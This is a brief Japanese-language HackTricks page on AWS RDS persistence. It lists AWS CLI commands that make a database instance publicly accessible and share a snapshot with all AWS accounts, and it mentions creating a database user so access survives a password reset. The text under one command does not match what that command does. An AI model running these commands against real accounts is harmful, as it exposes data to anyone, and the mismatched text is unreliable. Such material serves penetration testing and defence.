AWS - RDS Persistence

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

RDS

詳細情報は以下を確認してください：

この権限を持つ攻撃者は、既存のRDSインスタンスを変更して公開アクセスを有効にすることができます。

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

攻撃者は単にDB内にユーザーを作成することができるため、マスターユーザーのパスワードが変更されてもデータベースへのアクセスを失うことはありません。

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。

Last updated 1 month ago